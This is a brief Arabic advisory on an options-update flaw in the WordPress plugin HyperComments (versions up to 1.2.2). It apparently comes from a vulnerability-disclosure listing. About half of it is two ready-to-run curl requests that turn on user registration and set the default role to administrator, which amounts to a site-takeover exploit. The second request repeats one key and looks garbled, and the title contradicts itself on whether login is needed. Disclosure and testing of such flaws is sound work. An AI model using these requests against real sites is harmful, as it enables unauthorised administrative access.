
HyperComments <= 1.2.2 - غير موثّق (مشترك+) تحديث الخيارات التعسفي
إضافة HyperComments <= 1.2.2 - تحديث غير مصرح به للخيارات التعسفية (يمكن للمشتركين+)
إضافة HyperComments لووردبريس عرضة لتعديل غير مصرح به للبيانات مما قد يؤدي إلى تصعيد الامتيازات بسبب عدم وجود فحص للصلاحية في دالة hc_request_handler في جميع الإصدارات حتى 1.2.2 شاملة. هذا يتيح للمهاجمين غير الموثّقين تحديث خيارات تعسفية على موقع ووردبريس. يمكن استغلال ذلك لتحديث الدور الافتراضي للتسجيل إلى مسؤول وتمكين تسجيل المستخدمين ليحصل المهاجمون على وصول إداري للموقع الضعيف.
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"